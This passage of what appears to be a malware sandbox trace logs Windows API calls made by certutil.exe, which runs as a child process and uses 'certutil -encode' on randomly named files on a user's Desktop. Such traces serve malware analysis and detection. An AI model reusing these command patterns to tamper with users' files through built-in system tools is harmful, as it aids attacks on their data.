(dwCertEncodingType=0x1, pbCertEncoded=0x24297cf2270, cbCertEncoded=0xccc6) returned 0x0 [0241.421] CertCreateCRLContext (dwCertEncodingType=0x1, pbCrlEncoded=0x24297cf2270, cbCrlEncoded=0xccc6) returned 0x0 [0241.422] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x4, pbEncoded=0x24297cf2270, cbEncoded=0xccc6, dwFlags=0x8000, pDecodePara=0xe0a2acf420, pvStructInfo=0xe0a2acf4b0, pcbStructInfo=0xe0a2acf4a4 | out: pvStructInfo=0xe0a2acf4b0, pcbStructInfo=0xe0a2acf4a4) returned 0 [0241.423] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x15, pbEncoded=0x24297cf2270, cbEncoded=0xccc6, dwFlags=0x8000, pDecodePara=0xe0a2acf420, pvStructInfo=0xe0a2acf4b0, pcbStructInfo=0xe0a2acf4a4 | out: pvStructInfo=0xe0a2acf4b0, pcbStructInfo=0xe0a2acf4a4) returned 0 [0241.423] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x3b, pbEncoded=0x24297cf2270, cbEncoded=0xccc6, dwFlags=0x8000, pDecodePara=0xe0a2acf420, pvStructInfo=0xe0a2acf4b0, pcbStructInfo=0xe0a2acf4a4 | out: pvStructInfo=0xe0a2acf4b0, pcbStructInfo=0xe0a2acf4a4) returned 0 [0241.423] CryptMsgOpenToDecode (dwMsgEncodingType=0x10001, dwFlags=0x0, dwMsgType=0x0, hCryptProv=0x0, pRecipientInfo=0x0, pStreamInfo=0x0) returned 0x24297ccd0c0 [0241.432] CryptMsgUpdate (hCryptMsg=0x24297ccd0c0, pbData=0x24297cf2270, cbData=0xccc6, fFinal=1) returned 0 [0241.432] GetLastError () returned 0x8009310b [0241.432] CryptMsgClose (hCryptMsg=0x24297ccd0c0) returned 1 [0241.432] GetFileAttributesExW (in: lpFileName="NMgihtIW4j90xeC_.mkv.Sister" (normalized: "c:\\users\\fd1hvy\\desktop\\nmgihtiw4j90xec_.mkv.sister"), fInfoLevelId=0x0, lpFileInformation=0xe0a2acf4d0 | out: lpFileInformation=0xe0a2acf4d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x794294b0, ftCreationTime.dwHighDateTime=0x1d5e2cc, ftLastAccessTime.dwLowDateTime=0xa2fbffa0, ftLastAccessTime.dwHighDateTime=0x1d5e7f7, ftLastWriteTime.dwLowDateTime=0xa2fbffa0, ftLastWriteTime.dwHighDateTime=0x1d5e7f7, nFileSizeHigh=0x0, nFileSizeLow=0xccc6)) returned 1 [0241.433] _vsnwprintf (in: _Buffer=0xe0a2acf4d8, _BufferCount=0xb, _Format="%d", _ArgList=0xe0a2acf4c8 | out: _Buffer="359") returned 3 [0241.433] LoadStringW (in: hInstance=0x7ff70ad80000, uID=0x167, lpBuffer=0xe0a2acf290, cchBufferMax=128 | out: lpBuffer="Input Length = %d") returned 0x11 [0241.433] LocalAlloc (uFlags=0x0, uBytes=0x24) returned 0x24297cf1d20 [0241.433] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0241.433] _vsnwprintf (in: _Buffer=0xe0a2ace4c0, _BufferCount=0x1ff, _Format="Input Length = %d", _ArgList=0xe0a2acf518 | out: _Buffer="Input Length = 52422") returned 20 [0241.433] GetFileType (hFile=0x50) returned 0x2 [0241.433] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0xe0a2ace4c0*, nNumberOfCharsToWrite=0x14, lpNumberOfCharsWritten=0xe0a2ace474, lpReserved=0x0 | out: lpBuffer=0xe0a2ace4c0*, lpNumberOfCharsWritten=0xe0a2ace474*=0x14) returned 1 [0241.435] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0241.435] _vsnwprintf (in: _Buffer=0xe0a2ace4c0, _BufferCount=0x1ff, _Format="\n", _ArgList=0xe0a2acf518 | out: _Buffer="\n") returned 1 [0241.435] GetFileType (hFile=0x50) returned 0x2 [0241.435] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0xe0a2ace4c0*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0xe0a2ace474, lpReserved=0x0 | out: lpBuffer=0xe0a2ace4c0*, lpNumberOfCharsWritten=0xe0a2ace474*=0x1) returned 1 [0241.452] GetFileAttributesExW (in: lpFileName="NMgihtIW4j90xeC_.mkv.Cruel" (normalized: "c:\\users\\fd1hvy\\desktop\\nmgihtiw4j90xec_.mkv.cruel"), fInfoLevelId=0x0, lpFileInformation=0xe0a2acf4d0 | out: lpFileInformation=0xe0a2acf4d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xba855609, ftCreationTime.dwHighDateTime=0x1d6141f, ftLastAccessTime.dwLowDateTime=0xba855609, ftLastAccessTime.dwHighDateTime=0x1d6141f, ftLastWriteTime.dwLowDateTime=0xba8674d4, ftLastWriteTime.dwHighDateTime=0x1d6141f, nFileSizeHigh=0x0, nFileSizeLow=0x119ca)) returned 1 [0241.452] _vsnwprintf (in: _Buffer=0xe0a2acf4d8, _BufferCount=0xb, _Format="%d", _ArgList=0xe0a2acf4c8 | out: _Buffer="361") returned 3 [0241.452] LoadStringW (in: hInstance=0x7ff70ad80000, uID=0x169, lpBuffer=0xe0a2acf290, cchBufferMax=128 | out: lpBuffer="Output Length = %d") returned 0x12 [0241.452] LocalAlloc (uFlags=0x0, uBytes=0x26) returned 0x24297cf1ab0 [0241.452] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0241.452] _vsnwprintf (in: _Buffer=0xe0a2ace4c0, _BufferCount=0x1ff, _Format="Output Length = %d", _ArgList=0xe0a2acf518 | out: _Buffer="Output Length = 72138") returned 21 [0241.452] GetFileType (hFile=0x50) returned 0x2 [0241.452] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0xe0a2ace4c0*, nNumberOfCharsToWrite=0x15, lpNumberOfCharsWritten=0xe0a2ace474, lpReserved=0x0 | out: lpBuffer=0xe0a2ace4c0*, lpNumberOfCharsWritten=0xe0a2ace474*=0x15) returned 1 [0241.454] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0241.454] _vsnwprintf (in: _Buffer=0xe0a2ace4c0, _BufferCount=0x1ff, _Format="\n", _ArgList=0xe0a2acf518 | out: _Buffer="\n") returned 1 [0241.454] GetFileType (hFile=0x50) returned 0x2 [0241.454] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0xe0a2ace4c0*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0xe0a2ace474, lpReserved=0x0 | out: lpBuffer=0xe0a2ace4c0*, lpNumberOfCharsWritten=0xe0a2ace474*=0x1) returned 1 [0241.459] LocalFree (hMem=0x24297cf2270) returned 0x0 [0241.460] ?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z () returned 0x7ff70ad94120 [0241.460] _vsnwprintf (in: _Buffer=0xe0a2acf538, _BufferCount=0xb, _Format="%d", _ArgList=0xe0a2acf528 | out: _Buffer="2022") returned 4 [0241.460] LoadStringW (in: hInstance=0x7ff70ad80000, uID=0x7e6, lpBuffer=0xe0a2acf2f0, cchBufferMax=128 | out: lpBuffer="%ws: -%ws command completed successfully.") returned 0x29 [0241.460] LocalAlloc (uFlags=0x0, uBytes=0x54) returned 0x24297cc8e10 [0241.460] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0241.460] _vsnwprintf (in: _Buffer=0xe0a2ace520, _BufferCount=0x1ff, _Format="%ws: -%ws command completed successfully.", _ArgList=0xe0a2acf578 | out: _Buffer="CertUtil: -encode command completed successfully.") returned 49 [0241.460] GetFileType (hFile=0x50) returned 0x2 [0241.461] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0xe0a2ace520*, nNumberOfCharsToWrite=0x31, lpNumberOfCharsWritten=0xe0a2ace4d4, lpReserved=0x0 | out: lpBuffer=0xe0a2ace520*, lpNumberOfCharsWritten=0xe0a2ace4d4*=0x31) returned 1 [0241.461] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0241.461] _vsnwprintf (in: _Buffer=0xe0a2ace520, _BufferCount=0x1ff, _Format="\n", _ArgList=0xe0a2acf578 | out: _Buffer="\n") returned 1 [0241.461] GetFileType (hFile=0x50) returned 0x2 [0241.461] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0xe0a2ace520*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0xe0a2ace4d4, lpReserved=0x0 | out: lpBuffer=0xe0a2ace520*, lpNumberOfCharsWritten=0xe0a2ace4d4*=0x1) returned 1 [0241.468] LocalFree (hMem=0x0) returned 0x0 [0241.468] LocalFree (hMem=0x24297cc4430) returned 0x0 [0241.468] LocalFree (hMem=0x24297cd0810) returned 0x0 [0241.468] SetLastError (dwErrCode=0x80070716) [0241.468] _vsnwprintf (in: _Buffer=0xe0a2acf5a8, _BufferCount=0xb, _Format="%d", _ArgList=0xe0a2acf598 | out: _Buffer="511") returned 3 [0241.468] LoadStringW (in: hInstance=0x7ff70ad80000, uID=0x1ff, lpBuffer=0xe0a2acf360, cchBufferMax=128 | out: lpBuffer="Command Succeeded") returned 0x11 [0241.468] LocalAlloc (uFlags=0x0, uBytes=0x24) returned 0x24297cf2200 [0241.468] PostQuitMessage (nExitCode=0) [0241.468] GetMessageW (in: lpMsg=0xe0a2acfba0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0xe0a2acfba0) returned 0 [0241.469] LocalFree (hMem=0x24297cdb670) returned 0x0 [0241.469] LocalFree (hMem=0x24297cf21d0) returned 0x0 [0241.469] LocalFree (hMem=0x0) returned 0x0 [0241.469] GetModuleHandleW (lpModuleName="certadm.dll") returned 0x0 [0241.470] GetLastError () returned 0x7e [0241.470] GetModuleHandleW (lpModuleName="certcli.dll") returned 0x7ffcdebe0000 [0241.470] GetProcAddress (hModule=0x7ffcdebe0000, lpProcName="DllMain") returned 0x7ffcdebe1530 [0241.470] DllMain () returned 0x1 [0241.470] LocalFree (hMem=0x24297cdba90) returned 0x0 [0241.470] LocalFree (hMem=0x24297ccc060) returned 0x0 [0241.470] LocalFree (hMem=0x24297cf1d20) returned 0x0 [0241.470] LocalFree (hMem=0x24297cf1ab0) returned 0x0 [0241.470] LocalFree (hMem=0x24297cc8e10) returned 0x0 [0241.470] LocalFree (hMem=0x24297cf2200) returned 0x0 [0241.470] LocalFree (hMem=0x24297ce4c70) returned 0x0 [0241.470] LocalFree (hMem=0x24297ccbeb0) returned 0x0 [0241.471] GetModuleHandleW (lpModuleName="certenroll.dll") returned 0x0 [0241.471] GetLastError () returned 0x7e [0241.471] GetModuleHandleW (lpModuleName="certcli.dll") returned 0x7ffcdebe0000 [0241.471] GetProcAddress (hModule=0x7ffcdebe0000, lpProcName="DllMain") returned 0x7ffcdebe1530 [0241.471] DllMain () returned 0x1 [0241.471] exit (_Code=0) Thread: id = 71 os_tid = 0x1110 Process: id = "25" image_name = "certutil.exe" filename = "c:\\windows\\system32\\certutil.exe" page_root = "0x17e17000" os_pid = "0x1118" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "3" os_parent_pid = "0x1190" cmd_line = "certutil -encode \"PUKKYc6CLfNruQwL4y5O.gif.Sister\" \"PUKKYc6CLfNruQwL4y5O.gif.Cruel\"" cur_dir = "C:\\Users\\FD1HVy\\Desktop\\" os_username = "NQDPDE\\FD1HVy" bitness = "32" os_groups = "NQDPDE\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fd03" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 72 os_tid = 0x12f8 [0243.394] GetStartupInfoW (in: lpStartupInfo=0x4506b9fb10 | out: lpStartupInfo=0x4506b9fb10*(cb=0x68, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="certutil -encode \"PUKKYc6CLfNruQwL4y5O.gif.Sister\" \"PUKKYc6CLfNruQwL4y5O.gif.Cruel\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0243.401] GetModuleHandleW (lpModuleName=0x0) returned 0x7ff70ad80000 [0243.401] __set_app_type (_Type=0x1) [0243.401] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x7ff70ae6cd90) returned 0x0 [0243.401] __wgetmainargs (in: _Argc=0x7ff70aed3898, _Argv=0x7ff70aed38a0, _Env=0x7ff70aed38a8, _DoWildCard=0, _StartInfo=0x7ff70aed38b4 | out: _Argc=0x7ff70aed3898, _Argv=0x7ff70aed38a0, _Env=0x7ff70aed38a8) returned 0 [0243.405] _onexit (_Func=0x7ff70ae745a0) returned 0x7ff70ae745a0 [0243.405] _onexit (_Func=0x7ff70ae746c0) returned 0x7ff70ae746c0 [0243.405] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffce9120000 [0243.406] GetProcAddress (hModule=0x7ffce9120000, lpProcName="WerSetFlags") returned 0x7ffce913a530 [0243.406] WerSetFlags () returned 0x0 [0243.406] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0243.406] __iob_func () returned 0x7ffcea2dea00 [0243.406] _fileno (_File=0x7ffcea2dea30) returned 1 [0243.406] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0243.406] _wsetlocale (category=1, locale=".OCP") returned="English_United States.437" [0243.408] _wsetlocale (category=3, locale=".OCP") returned="English_United States.437" [0243.408] _wsetlocale (category=4, locale=".OCP") returned="English_United States.437" [0243.408] _wsetlocale (category=5, locale=".OCP") returned="English_United States.437" [0243.409] GetConsoleOutputCP () returned 0x1b5 [0243.489] _vsnwprintf (in: _Buffer=0x4506b9fa80, _BufferCount=0xb, _Format=".%d", _ArgList=0x4506b9f9a8 | out: _Buffer=".437") returned 4 [0243.489] _wsetlocale (category=2, locale=".437") returned="English_United States.437" [0243.489] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0243.489] GetFileType (hFile=0x50) returned 0x2 [0243.490] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffce9120000 [0243.490] GetProcAddress (hModule=0x7ffce9120000, lpProcName="SetThreadUILanguage") returned 0x7ffce913a990 [0243.490] SetThreadUILanguage (LangId=0x0) returned 0x409 [0243.562] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1=".exe", cchCount1=-1, lpString2=".exe", cchCount2=-1) returned 2 [0243.562] GetCommandLineW () returned="certutil -encode \"PUKKYc6CLfNruQwL4y5O.gif.Sister\" \"PUKKYc6CLfNruQwL4y5O.gif.Cruel\"" [0243.562] LocalAlloc (uFlags=0x0, uBytes=0x12) returned 0x162a5b1b8c0 [0243.562] LocalAlloc (uFlags=0x0, uBytes=0x1a) returned 0x162a5b0acd0 [0243.562] LocalFree (hMem=0x162a5b1b8c0) returned 0x0 [0243.562] LocalAlloc (uFlags=0x0, uBytes=0x1a) returned 0x162a5b141c0 [0243.562] LocalAlloc (uFlags=0x0, uBytes=0x22) returned 0x162a5b142b0 [0243.562] LocalFree (hMem=0x162a5b141c0) returned 0x0 [0243.562] LocalFree (hMem=0x162a5b0acd0) returned 0x0 [0243.562] LocalFree (hMem=0x0) returned 0x0 [0243.562] ?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z () returned 0x0 [0243.562] ?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z () returned 0x7ff70ad94120 [0243.563] GetCommandLineW () returned="certutil -encode \"PUKKYc6CLfNruQwL4y5O.gif.Sister\" \"PUKKYc6CLfNruQwL4y5O.gif.Cruel\"" [0243.563] LocalAlloc (uFlags=0x0, uBytes=0x12) returned 0x162a5b1b5e0 [0243.563] GetSystemTime (in: lpSystemTime=0x4506b9f770 | out: lpSystemTime=0x4506b9f770*(wYear=0x7e4, wMonth=0x4, wDayOfWeek=0x4, wDay=0x10, wHour=0x12, wMinute=0x31, wSecond=0x12, wMilliseconds=0x68)) [0243.563] SystemTimeToFileTime (in: lpSystemTime=0x4506b9f770, lpFileTime=0x4506b9f768 | out: lpFileTime=0x4506b9f768) returned 1 [0243.563] FileTimeToLocalFileTime (in: lpFileTime=0x4506b9f768, lpLocalFileTime=0x4506b9f730 | out: lpLocalFileTime=0x4506b9f730) returned 1 [0243.563] FileTimeToSystemTime (in: lpFileTime=0x4506b9f730, lpSystemTime=0x4506b9f4a0 | out: lpSystemTime=0x4506b9f4a0) returned 1 [0243.563] GetDateFormatW (in: Locale=0x400, dwFlags=0x1, lpDate=0x4506b9f4a0, lpFormat=0x0, lpDateStr=0x4506b9f5b0, cchDate=128 | out: lpDateStr="4/16/2020") returned 10 [0243.564] GetTimeFormatW (in: Locale=0x400, dwFlags=0x2, lpTime=0x4506b9f4a0, lpFormat=0x0, lpTimeStr=0x4506b9f4b0, cchTime=128 | out: lpTimeStr="8:49 PM") returned 8 [0243.564] _vsnwprintf (in: _Buffer=0x4506b9f4be, _BufferCount=0x78, _Format=" %02u.%03us", _ArgList=0x4506b9f488 | out: _Buffer=" 18.104s") returned 8 [0243.564] LocalAlloc (uFlags=0x0, uBytes=0x34) returned 0x162a5b1e100 [0243.564] SetLastError (dwErrCode=0x80070716) [0243.564] _vsnwprintf (in: _Buffer=0x4506b9f538, _BufferCount=0xb, _Format="%d", _ArgList=0x4506b9f528 | out: _Buffer="948") returned 3 [0243.564] LoadStringW (in: hInstance=0x7ff70ad80000, uID=0x3b4, lpBuffer=0x4506b9f2f0, cchBufferMax=128 | out: lpBuffer="Begin") returned 0x5 [0243.564] LocalAlloc (uFlags=0x0, uBytes=0xc) returned 0x162a5b1b980 [0243.564] LocalAlloc (uFlags=0x0, uBytes=0x640) returned 0x162a5b11d20 [0243.565] LocalFree (hMem=0x162a5b1e100) returned 0x0 [0243.565] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x4506b9f7e0 | out: lpSystemTimeAsFileTime=0x4506b9f7e0*(dwLowDateTime=0xbbc8e1ed, dwHighDateTime=0x1d6141f)) [0243.565] GetLocalTime (in: lpSystemTime=0x4506b9f818 | out: lpSystemTime=0x4506b9f818*(wYear=0x7e4, wMonth=0x4, wDayOfWeek=0x4, wDay=0x10, wHour=0x14, wMinute=0x31, wSecond=0x12, wMilliseconds=0x69)) [0243.565] SystemTimeToFileTime (in: lpSystemTime=0x4506b9f818, lpFileTime=0x4506b9f7f0 | out: lpFileTime=0x4506b9f7f0) returned 1 [0243.565] CompareFileTime (lpFileTime1=0x4506b9f7f0, lpFileTime2=0x4506b9f7e0) returned 1 [0243.565] _vsnwprintf (in: _Buffer=0x4506b9f828, _BufferCount=0x13, _Format="GMT %s %.2f", _ArgList=0x4506b9f7b8 | out: _Buffer="GMT + 2.00") returned 10 [0243.565] LocalFree (hMem=0x162a5b1b5e0) returned 0x0 [0243.565] GetModuleHandleW (lpModuleName="certca.dll") returned 0x7ffcde520000 [0243.565] FindResourceW (hModule=0x7ffcde520000, lpName=0x1, lpType=0x10) returned 0x7ffcde5e0090 [0243.565] LoadResource (hModule=0x7ffcde520000, hResInfo=0x7ffcde5e0090) returned 0x7ffcde5e00b0 [0243.565] LockResource (hResData=0x7ffcde5e00b0) returned 0x7ffcde5e00b0 [0243.566] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="VS_VERSION_INFO", cchCount1=-1, lpString2="VS_VERSION_INFO", cchCount2=-1) returned 2 [0243.566] _vsnwprintf (in: _Buffer=0x7ff70aed6890, _BufferCount=0x3f, _Format="%u.%u.%u.%u", _ArgList=0x4506b9f858 | out: _Buffer="10.0.15063.447") returned 14 [0243.566] GetACP () returned 0x4e4 [0243.566] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x7ff70ae9f388, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7 [0243.566] LocalAlloc (uFlags=0x0, uBytes=0x10) returned 0x162a5b1b500 [0243.566] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x7ff70ae9f388, cbMultiByte=-1, lpWideCharStr=0x162a5b1b500, cchWideChar=7 | out: lpWideCharStr="retail") returned 7 [0243.566] LocalAlloc (uFlags=0x0, uBytes=0x2c) returned 0x162a5b1df80 [0243.566] _vsnwprintf (in: _Buffer=0x162a5b1df80, _BufferCount=0x15, _Format="%ws %ws", _ArgList=0x4506b9f8a8 | out: _Buffer="10.0.15063.447 retail") returned 21 [0243.566] LocalFree (hMem=0x162a5b1b500) returned 0x0 [0243.566] LocalFree (hMem=0x0) returned 0x0 [0243.566] GetModuleHandleW (lpModuleName="certcli.dll") returned 0x7ffcdebe0000 [0243.566] GetACP () returned 0x4e4 [0243.566] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x7ff70ae9f388, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7 [0243.566] LocalAlloc (uFlags=0x0, uBytes=0x10) returned 0x162a5b1ba20 [0243.566] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x7ff70ae9f388, cbMultiByte=-1, lpWideCharStr=0x162a5b1ba20, cchWideChar=7 | out: lpWideCharStr="retail") returned 7 [0243.566] LocalAlloc (uFlags=0x0, uBytes=0x2c) returned 0x162a5b1e180 [0243.566] _vsnwprintf (in: _Buffer=0x162a5b1e180, _BufferCount=0x15, _Format="%ws %ws", _ArgList=0x4506b9f8a8 | out: _Buffer="10.0.15063.447 retail") returned 21 [0243.566] LocalFree (hMem=0x162a5b1ba20) returned 0x0 [0243.566] LocalFree (hMem=0x0) returned 0x0 [0243.566] GetACP () returned 0x4e4 [0243.566] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x7ff70ae9f388, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7 [0243.566] LocalAlloc (uFlags=0x0, uBytes=0x10) returned 0x162a5b1b340 [0243.566] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x7ff70ae9f388, cbMultiByte=-1, lpWideCharStr=0x162a5b1b340, cchWideChar=7 | out: lpWideCharStr="retail") returned 7 [0243.566] LocalAlloc (uFlags=0x0, uBytes=0x2c) returned 0x162a5b1dcc0 [0243.566] _vsnwprintf (in: _Buffer=0x162a5b1dcc0, _BufferCount=0x15, _Format="%ws %ws", _ArgList=0x4506b9f8d8 | out: _Buffer="10.0.15063.447 retail") returned 21 [0243.566] LocalFree (hMem=0x162a5b1b340) returned 0x0 [0243.566] LocalFree (hMem=0x162a5b1df80) returned 0x0 [0243.567] LocalFree (hMem=0x162a5b1e180) returned 0x0 [0243.567] LocalFree (hMem=0x162a5b1dcc0) returned 0x0 [0243.567] LoadIconW (hInstance=0x0, lpIconName=0x7f00) returned 0x10027 [0243.567] LoadCursorW (hInstance=0x0, lpCursorName=0x7f00) returned 0x10003 [0243.567] GetStockObject (i=0) returned 0x900010 [0243.567] RegisterClassW (lpWndClass=0x4506b9fa00) returned 0xc1a2 [0243.567] CreateWindowExW (dwExStyle=0x0, lpClassName="CertUtil", lpWindowName="CertUtil Application", dwStyle=0xcf0000, X=-2147483648, Y=-2147483648, nWidth=-2147483648, nHeight=-2147483648, hWndParent=0x0, hMenu=0x0, hInstance=0x7ff70ad80000, lpParam=0x0) returned 0x2202be [0243.686] NtdllDefWindowProc_W () returned 0x0 [0243.687] NtdllDefWindowProc_W () returned 0x1 [0243.693] NtdllDefWindowProc_W () returned 0x0 [0243.703] UpdateWindow (hWnd=0x2202be) returned 1 [0243.703] PostMessageW (hWnd=0x2202be, Msg=0x400, wParam=0x0, lParam=0x162a5b0217e) returned 1 [0243.703] GetMessageW (in: lpMsg=0x4506b9fa50, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x4506b9fa50) returned 1 [0243.703] TranslateMessage (lpMsg=0x4506b9fa50) returned 0 [0243.703] DispatchMessageW (lpMsg=0x4506b9fa50) returned 0x0 [0243.704] NtdllDefWindowProc_W () returned 0x0 [0243.704] GetMessageW (in: lpMsg=0x4506b9fa50, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x4506b9fa50) returned 1 [0243.704] TranslateMessage (lpMsg=0x4506b9fa50) returned 0 [0243.704] DispatchMessageW (lpMsg=0x4506b9fa50) returned 0x0 [0243.704] LocalAlloc (uFlags=0x0, uBytes=0x96) returned 0x162a5b091a0 [0243.704] LocalAlloc (uFlags=0x0, uBytes=0xa2) returned 0x162a5b0ae80 [0243.704] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="p", cchCount2=-1) returned 1 [0243.704] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="pin", cchCount2=-1) returned 1 [0243.704] SetLastError (dwErrCode=0x80070716) [0243.704] _vsnwprintf (in: _Buffer=0x4506b9f458, _BufferCount=0xb, _Format="%d", _ArgList=0x4506b9f448 | out: _Buffer="465") returned 3 [0243.704] LoadStringW (in: hInstance=0x7ff70ad80000, uID=0x1d1, lpBuffer=0x4506b9f210, cchBufferMax=128 | out: lpBuffer="Command Line") returned 0xc [0243.704] LocalAlloc (uFlags=0x0, uBytes=0x1a) returned 0x162a5b13f20 [0243.705] ?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z () returned 0x0 [0243.705] ?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z () returned 0x7ff70ad94120 [0243.705] GetEnvironmentVariableW (in: lpName="certsrv_rawhex", lpBuffer=0x4506b9f1f0, nSize=0x104 | out: lpBuffer="\x01") returned 0x0 [0243.705] GetLastError () returned 0xcb [0243.705] _wcsnicmp (_String1="Config", _String2="enroll", _MaxCount=0x6) returned -2 [0243.705] _wcsnicmp (_String1="CA", _String2="en", _MaxCount=0x2) returned -2 [0243.705] _wcsnicmp (_String1="Policy", _String2="enroll", _MaxCount=0x6) returned 11 [0243.705] _wcsnicmp (_String1="Exit", _String2="enro", _MaxCount=0x4) returned 10 [0243.705] _wcsnicmp (_String1="Restore", _String2="enroll", _MaxCount=0x7) returned 13 [0243.705] _wcsnicmp (_String1="Template", _String2="enroll", _MaxCount=0x8) returned 15 [0243.705] _wcsnicmp (_String1="Enroll", _String2="enroll", _MaxCount=0x6) returned 0 [0243.705] _wcsnicmp (_String1="Config", _String2="enroll", _MaxCount=0x6) returned -2 [0243.705] _wcsnicmp (_String1="CA", _String2="en", _MaxCount=0x2) returned -2 [0243.705] _wcsnicmp (_String1="Policy", _String2="enroll", _MaxCount=0x6) returned 11 [0243.706] _wcsnicmp (_String1="Exit", _String2="enro", _MaxCount=0x4) returned 10 [0243.706] _wcsnicmp (_String1="Restore", _String2="enroll", _MaxCount=0x7) returned 13 [0243.706] _wcsnicmp (_String1="Template", _String2="enroll", _MaxCount=0x8) returned 15 [0243.706] _wcsnicmp (_String1="Enroll", _String2="enroll", _MaxCount=0x6) returned 0 [0243.706] _wcsnicmp (_String1="Config", _String2="enroll", _MaxCount=0x6) returned -2 [0243.706] _wcsnicmp (_String1="CA", _String2="en", _MaxCount=0x2) returned -2 [0243.706] _wcsnicmp (_String1="Policy", _String2="enroll", _MaxCount=0x6) returned 11 [0243.706] _wcsnicmp (_String1="Exit", _String2="enro", _MaxCount=0x4) returned 10 [0243.706] _wcsnicmp (_String1="Restore", _String2="enroll", _MaxCount=0x7) returned 13 [0243.706] _wcsnicmp (_String1="Template", _String2="enroll", _MaxCount=0x8) returned 15 [0243.706] _wcsnicmp (_String1="Enroll", _String2="enroll", _MaxCount=0x6) returned 0 [0243.706] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Cryptography\\AutoEnrollment", ulOptions=0x0, samDesired=0x20019, phkResult=0x4506b9eeb8 | out: phkResult=0x4506b9eeb8*=0x23c) returned 0x0 [0243.706] LocalAlloc (uFlags=0x0, uBytes=0x5e) returned 0x162a5b09390 [0243.706] RegQueryValueExW (in: hKey=0x23c, lpValueName="RawHex", lpReserved=0x0, lpType=0x4506b9f428, lpData=0x4506b9f458, lpcbData=0x4506b9f420*=0x4 | out: lpType=0x4506b9f428*=0x0, lpData=0x4506b9f458*=0x0, lpcbData=0x4506b9f420*=0x4) returned 0x2 [0243.706] LocalFree (hMem=0x162a5b09390) returned 0x0 [0243.706] RegCloseKey (hKey=0x23c) returned 0x0 [0243.706] LocalFree (hMem=0x0) returned 0x0 [0243.706] CryptFindOIDInfo (dwKeyType=0x1, pvKey=0x7ff70ae80270, dwGroupId=0x7) returned 0x162a5b2de10 [0243.755] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, 